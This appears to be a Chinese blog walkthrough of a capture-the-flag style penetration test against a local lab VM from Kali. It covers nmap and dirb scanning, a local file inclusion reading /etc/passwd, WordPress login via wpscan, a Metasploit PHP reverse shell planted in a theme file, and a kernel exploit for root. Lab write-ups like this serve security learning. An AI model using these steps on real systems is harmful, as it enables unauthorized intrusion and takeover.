第一次都有点不熟练,以后一定多练几次

打开这次环境需要的漏洞靶机,并且再开一台 kali 攻击机,这里我用 xshell 连接

在这里我们可以用 nmap 来扫描电脑开放的网段。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统,129 是我 kali 的 ip,推断 130 那个就是靶机 ip 了

nmap -sP 192.168.204.0/24

排除掉一些特别大或特别小的子网,最终还剩下两个选择,在 vmware 的网络适配器里找到靶机的对应的 MAC 地址就可

那么我们这里靶机的 IP 就是 192.168.204.130

通过这条 ip 我们可以查询该靶机上现在在运行哪些软件,

用扫描器扫端口,冲他。

通过端口号我们就可以对应查询到该服务器目前执行着哪些协议

Nmap 不仅可以告知端口还有端口运行的协议、版本

下面便是我们扫出来的结果

nmap -p 1-65535 -A 192.168.204.130

接下来就该考虑从哪个端口入手了,http or ssh?

我们先去浏览器看一下这个 ip 吧

啥也不是..

那么只能扫一下目录康康囖

dirb http://192.168.204.130/

扫描结果有 15 个可以利用的

每个都尝试了一下发现都没有什么突破的地方,倒是扫出来不少 wordpress

那么就具体一点,直接指定后缀关键字搜索

dirb http://192.168.204.130/ -X .txt,.php,.zip

挨个查看,下一步提示出来啦。看来方向在 http 这里没错的

secre.txt 里有线索

curl http://192.168.204.130/secret.txt

第一次 fuzz 出来都是没用的东西,那么第二次还是采用过滤吧

在 fuzz 里 --hw(--hc --hl)都是把固定的位数隐藏起来,这也就直接过滤掉了 12 位的 word

把这个参数 file 和之前给的 location.txt 拼接起来

http://192.168.204.130/index.php?file=location.txt

提示让我们在另一个 php 里面寻找答案且参数给定 "secrettier360"。那么除了 index.php, 我们还剩下 image.php

访问 http://192.168.204.130/image.php?secrettier360=/etc/passwd

结果提示应该在 /home/saket 中寻找 password.txt

我猜是 ubuntu 的登陆密码

然鹅不是。。

但是我们之前还扫出来一个 wordress 的网站,并且他还是有登陆界面的,那么这串字符会不会是博客的账户密码呢?

试试看

wpscan --url http://192.168.204.130/wordpress/ --enumerate u

得到账户用户名 victor

用前面得到的密码我们进入网站

在可编辑的项目栏找到可以操作的 php,就是这了。

接下来一步就是上传指令进行提权了,一句话木马、反弹链接、msf 都可以,我个人是认为最好用 msf 的,因为一句话木马存在一些不可预测的限制,有时候就比如服务器 ip 可能会改变,用菜刀啥的就连不上,有时反弹链接要比一句话木马主动连接要更好一点。

这里我就采用 msf 生成 php 的反弹链接的代码去监听了

生成一个 shell.php

在新开一个窗口,用 msfconsole 去启动监听

运行监听模块

去获取 shell.php

然后粘贴到 wordpress 的 secret.php 编辑栏里

上传代码,通过浏览器运行链接成功

监听配置完成

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.204.129
set port 4444
exploit

sudo -i(排除)

history

/ find

操作系统内核漏洞 ---

已经知道内核版本是多少了,显而易见这是值得尝试的一条线

还是照例打开 msfconsole

然后查找有关该版本号的 ubuntu 漏洞

扫出来一条小于 4.13 的版本并且是个存在提权的漏洞,后面的 c 文件是个已经写好的脚本,直接拿来用就好,不跟你嘻嘻哈哈

找到后拿出来编译一下传到靶机上去

传上去之后 shell 开始,发现操作权限不够我们首先要增加可执行权限

查看目录找到 root 的文件

cat 打开是一串哈希值,解不出来。看来是登陆不进去了,不过我们都获得 root 权限,也无所谓了

至于 key.txt 什么的,随他们去吧。。

一次小小渗透就算完成了,还是翻阅查找了不少东西的,在此感谢。

更新于

请我喝[茶]~( ̄▽ ̄)~*

1sme 微信支付

微信支付